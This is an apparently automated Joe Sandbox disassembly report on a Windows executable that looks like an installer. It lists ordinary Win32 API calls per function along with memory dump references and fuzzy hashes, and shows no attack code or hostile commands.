                                                                                    • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                    • String ID:
                                                                                    • API String ID: 1770779139-0
                                                                                    • Opcode ID: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
                                                                                    • Instruction ID: 219e0d69ac6b6a38dcb61baa39fbc914f783b163521ae56cddb293ea60412e1c
                                                                                    • Opcode Fuzzy Hash: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
                                                                                    • Instruction Fuzzy Hash: E601D42230472036D6217B795C86E2F26A8CFC5B15F50457FB649BB283DA3D8C0063BD
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(user32.dll), ref: 0049379C
                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 004937A9
                                                                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 004937B6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$HandleModule
                                                                                    • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                                    • API String ID: 667068680-2254406584
                                                                                    • Opcode ID: bc243d748a11952884276210872aa95fdf32b4a39955ab03d8a14887b4b54015
                                                                                    • Instruction ID: addf7fefb297577c5f12cb6f7e4bbe149f94bc2dbc72dea36d33d0c0dd90845d
                                                                                    • Opcode Fuzzy Hash: bc243d748a11952884276210872aa95fdf32b4a39955ab03d8a14887b4b54015
                                                                                    • Instruction Fuzzy Hash: 74F0F6D274171467DA2069F60C82F7BAACCDB93762F148077BD05A7382E99D8E0542FE
                                                                                    APIs
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00457220
                                                                                    • GetExitCodeProcess.KERNEL32(?,lI), ref: 00457241
                                                                                    • CloseHandle.KERNEL32(?,00457274,?,?,00457A8F,00000000,00000000), ref: 00457267
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                    • String ID: lI$GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                    • API String ID: 2573145106-911929905
                                                                                    • Opcode ID: 57667e993de5712369b0a272a04b55a8846431b558e145026f984518073022b0
                                                                                    • Instruction ID: 5860e754879763acac88ff1443aad6da1c0af202f9247d34d09c584a8b2c0160
                                                                                    • Opcode Fuzzy Hash: 57667e993de5712369b0a272a04b55a8846431b558e145026f984518073022b0
                                                                                    • Instruction Fuzzy Hash: 7501A234608204AFDF20EB999D42E1A73E8EB4A714F2041F7F810D73D2DA7C9D04D658
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(02470000,BZ2_bzDecompressInit), ref: 0045CDB1
                                                                                    • GetProcAddress.KERNEL32(02470000,BZ2_bzDecompress), ref: 0045CDC1
                                                                                    • GetProcAddress.KERNEL32(02470000,BZ2_bzDecompressEnd), ref: 0045CDD1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc
                                                                                    • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                                    • API String ID: 190572456-212574377
                                                                                    • Opcode ID: 4e25438f18f14d5aa4b9246e441ecaa421a620dab92095c903eafcbbb7267c35
                                                                                    • Instruction ID: 1838bd6a3fc69983aea635b8e0361122e28d55063b6a1ad71f1ff2e1482e7c5d
                                                                                    • Opcode Fuzzy Hash: 4e25438f18f14d5aa4b9246e441ecaa421a620dab92095c903eafcbbb7267c35
                                                                                    • Instruction Fuzzy Hash: 86F0A9B05007009FDB24DB26BEC67272AA7E7A4746F14843BD819A6263F77C045DCA5C
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,0047F8E7), ref: 0042E8A9
                                                                                    • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E8AF
                                                                                    • InterlockedExchange.KERNEL32(0049A668,00000001), ref: 0042E8C0
                                                                                      • Part of subcall function 0042E820: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042E8E4,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E836
                                                                                      • Part of subcall function 0042E820: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E83C
                                                                                      • Part of subcall function 0042E820: InterlockedExchange.KERNEL32(0049A660,00000001), ref: 0042E84D
                                                                                    • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E8D4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                                    • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                    • API String ID: 142928637-2676053874
                                                                                    • Opcode ID: 92209b350bfe604f61bd1406e785eba3252aab3c9a25e474ddb7b579c04d4a00
                                                                                    • Instruction ID: c365c5bc722f159dc4e6bf90002f67a18111edd1cc3b7a2fef3254202be3c5aa
                                                                                    • Opcode Fuzzy Hash: 92209b350bfe604f61bd1406e785eba3252aab3c9a25e474ddb7b579c04d4a00
                                                                                    • Instruction Fuzzy Hash: 02E092A1341720AAEB1077B77C8AF9A2258CB11729F5C4037F180A61D2C6BD0C90CE9E
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,004970E3), ref: 004776CE
                                                                                    • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004776DB
                                                                                    • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004776EB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$HandleModule
                                                                                    • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                    • API String ID: 667068680-222143506
                                                                                    • Opcode ID: 72b63ccca095d4596e185588666964d96aa2feb47b4604f739c524890b31c532
                                                                                    • Instruction ID: cfeeddb06e0de6ce6ebab5647243e6050a865ade16457065002c887e192085cf
                                                                                    • Opcode Fuzzy Hash: 72b63ccca095d4596e185588666964d96aa2feb47b4604f739c524890b31c532
                                                                                    • Instruction Fuzzy Hash: 1BC012E0245700EDDA00B7F12CC3D772558D550F24750843B705879183D77C1C008F2C
                                                                                    APIs
                                                                                    • GetFocus.USER32 ref: 0041B755
                                                                                    • 73A0A570.USER32(?), ref: 0041B761
                                                                                    • 73A08830.GDI32(00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B796
                                                                                    • 73A022A0.GDI32(00000000,00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B7A2
                                                                                    • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B7D0
                                                                                    • 73A08830.GDI32(00000000,00000000,00000000,0041B811,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B804
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: A08830$A022A16310A570Focus
                                                                                    • String ID:
                                                                                    • API String ID: 3731147114-0
                                                                                    • Opcode ID: 93e68c4b9a3bd67db3154bc0fc4d8c0f4444c0b5e7637da7f247583ea3dba257
                                                                                    • Instruction ID: e4fa2330707e2e3496a7563b6e1a8945dd65194040c1b513b55e56702052f46b
                                                                                    • Opcode Fuzzy Hash: 93e68c4b9a3bd67db3154bc0fc4d8c0f4444c0b5e7637da7f247583ea3dba257
                                                                                    • Instruction Fuzzy Hash: 33512D74A00208AFCB11DFA9C855AEEBBF9FF49704F104466F504A7390D7789981CBA9
                                                                                    APIs
                                                                                    • GetFocus.USER32 ref: 0041BA27
                                                                                    • 73A0A570.USER32(?), ref: 0041BA33
                                                                                    • 73A08830.GDI32(00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA6D
                                                                                    • 73A022A0.GDI32(00000000,00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA79
                                                                                    • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BA9D
                                                                                    • 73A08830.GDI32(00000000,00000000,00000000,0041BADE,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BAD1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: A08830$A022A16310A570Focus
                                                                                    • String ID:
                                                                                    • API String ID: 3731147114-0
                                                                                    • Opcode ID: 001e89b2f4c2121d9a6ec2d11db6f12347d51ba97533173606e056219e37f7cb
                                                                                    • Instruction ID: 8a06375b061ea5bfc02952791cdae78cf5b61e443f36c9dad2d84499db0416b2
                                                                                    • Opcode Fuzzy Hash: 001e89b2f4c2121d9a6ec2d11db6f12347d51ba97533173606e056219e37f7cb
                                                                                    • Instruction Fuzzy Hash: FE510975A002189FCB11DFA9C891AAEBBF9FF49700F15806AF504EB751D7789D40CBA4
                                                                                    APIs
                                                                                    • GetFocus.USER32 ref: 0041B58E
                                                                                    • 73A0A570.USER32(?,00000000,0041B668,?,?,?,?), ref: 0041B59A
                                                                                    • 73A14620.GDI32(?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5B6
                                                                                    • 73A3E680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5D3
                                                                                    • 73A3E680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668), ref: 0041B5EA
                                                                                    • 73A0A480.USER32(?,?,0041B643,?,?), ref: 0041B636
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: E680$A14620A480A570Focus
                                                                                    • String ID:
                                                                                    • API String ID: 932946509-0
                                                                                    • Opcode ID: 90736dfb4065eff224967c8bcb4d67110e7e5550b3a77470f42cb8b0a49e908e
                                                                                    • Instruction ID: 7d41d09f6123fe0998bcf531a8d6f09bc5b1e179d78523dd82c4b1b978091a2c
                                                                                    • Opcode Fuzzy Hash: 90736dfb4065eff224967c8bcb4d67110e7e5550b3a77470f42cb8b0a49e908e
                                                                                    • Instruction Fuzzy Hash: 7E41D571A04254AFDB10DFA9C886EAFBBB4EB55704F1484AAF500EB351D3389D11CBA5
                                                                                    APIs
                                                                                    • SetLastError.KERNEL32(00000057,00000000,0045C838,?,?,?,?,00000000), ref: 0045C7D7
                                                                                    • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045C8A4,?,00000000,0045C838,?,?,?,?,00000000), ref: 0045C816
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast
                                                                                    • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                                    • API String ID: 1452528299-1580325520
                                                                                    • Opcode ID: ef918fb2a5af0324286362805bab636c6eae7542a12872d5b8c908973a1048fb
                                                                                    • Instruction ID: f1a5a0da2dcc97a3faf8a15e8aeeb0a96b83315a605ea6bcd06888aa97a57620
                                                                                    • Opcode Fuzzy Hash: ef918fb2a5af0324286362805bab636c6eae7542a12872d5b8c908973a1048fb
                                                                                    • Instruction Fuzzy Hash: 3111D835200305BFD711EAA1C9C1A9ABAACDB48707F6040776D0092783D73C9F0AD96D
                                                                                    APIs
                                                                                    • GetSystemMetrics.USER32(0000000B), ref: 0041BDE5
                                                                                    • GetSystemMetrics.USER32(0000000C), ref: 0041BDEF
                                                                                    • 73A0A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDF9
                                                                                    • 73A14620.GDI32(00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE20
                                                                                    • 73A14620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE2D
                                                                                    • 73A0A480.USER32(00000000,00000000,0041BE73,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE66
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: A14620MetricsSystem$A480A570
                                                                                    • String ID:
                                                                                    • API String ID: 1130675633-0
                                                                                    • Opcode ID: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                                                    • Instruction ID: cee0947e7f2791638d7e7c91bd9cc57ffb528c4a132e606019bcc307a049f0f1
                                                                                    • Opcode Fuzzy Hash: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                                                    • Instruction Fuzzy Hash: 40212C74E046499FEB00EFA9C982BEEB7B4EB48714F10842AF514B7781D7785940CBA9
                                                                                    APIs
                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 0047CC9E
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046BD7C), ref: 0047CCC4
                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 0047CCD4
                                                                                    • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047CCF5
                                                                                    • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047CD09
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047CD25
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long$Show
                                                                                    • String ID:
                                                                                    • API String ID: 3609083571-0
                                                                                    • Opcode ID: 945f3c3bef6479fa77638ae1ae675c7ba863dfa3b4bcef5104c996364b2eaea0
                                                                                    • Instruction ID: b9d10cbe0955a365ec79174b91f205d0e2d6322d15c7b647bae3529478a090fa
                                                                                    • Opcode Fuzzy Hash: 945f3c3bef6479fa77638ae1ae675c7ba863dfa3b4bcef5104c996364b2eaea0
                                                                                    • Instruction Fuzzy Hash: 9A010CB5651210ABD710D7A8CD81F663798AB1D334F09067AB999DF2E2C629DC108B49
                                                                                    APIs
                                                                                      • Part of subcall function 0041A6F0: CreateBrushIndirect.GDI32 ref: 0041A75B
                                                                                    • UnrealizeObject.GDI32(00000000), ref: 0041B28C
                                                                                    • SelectObject.GDI32(?,00000000), ref: 0041B29E
                                                                                    • SetBkColor.GDI32(?,00000000), ref: 0041B2C1
                                                                                    • SetBkMode.GDI32(?,00000002), ref: 0041B2CC
                                                                                    • SetBkColor.GDI32(?,00000000), ref: 0041B2E7
                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0041B2F2
                                                                                      • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                    • String ID:
                                                                                    • API String ID: 3527656728-0
                                                                                    • Opcode ID: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                                    • Instruction ID: 5f3c9a08814bcb0dec11b684bd4148c9aa8da507e688bf70d4fc6563dceee2e6
                                                                                    • Opcode Fuzzy Hash: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                                    • Instruction Fuzzy Hash: 7EF0C2B1651501ABCE00FFBAD9CAE4B37A89F043097088057B544DF197C97CD8548B3D
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045300B
                                                                                    • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045301B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateFileHandle
                                                                                    • String ID: $pI$.tmp$}RI
                                                                                    • API String ID: 3498533004-1860564545
                                                                                    • Opcode ID: 8789a208b1386c54c911cfdfe787610a42f1868093a374a585ebd63c8429b2e4
                                                                                    • Instruction ID: 59b3140617fbadefd4c9ffb48c61b81df6a531bfad3e19e72d5fef91abd571f9
                                                                                    • Opcode Fuzzy Hash: 8789a208b1386c54c911cfdfe787610a42f1868093a374a585ebd63c8429b2e4
                                                                                    • Instruction Fuzzy Hash: 0031A770A00219ABCB11EF95D942B9FBBB5AF45715F60412BF800B73C2D6785F0587AD
                                                                                    APIs
                                                                                      • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                    • ShowWindow.USER32(?,00000005,00000000,00496485,?,?,00000000), ref: 00496256
                                                                                      • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                                      • Part of subcall function 004072B0: SetCurrentDirectoryA.KERNEL32(00000000,?,0049627E,00000000,00496451,?,?,00000005,00000000,00496485,?,?,00000000), ref: 004072BB
                                                                                      • Part of subcall function 0042D418: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4A6,?,?,?,00000001,?,0045559A,00000000,00455602), ref: 0042D44D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                    • String ID: .dat$.msg$IMsg$Uninstall
                                                                                    • API String ID: 3312786188-1660910688
                                                                                    • Opcode ID: 23a76306a6ad414d2dba017a661bccc660dfd398584fab5f483c78eba6c01499
                                                                                    • Instruction ID: 58d6af22fd8ad1ff54f71e35ba593e4f31a3bf997598853b00730072561c9efa
                                                                                    • Opcode Fuzzy Hash: 23a76306a6ad414d2dba017a661bccc660dfd398584fab5f483c78eba6c01499
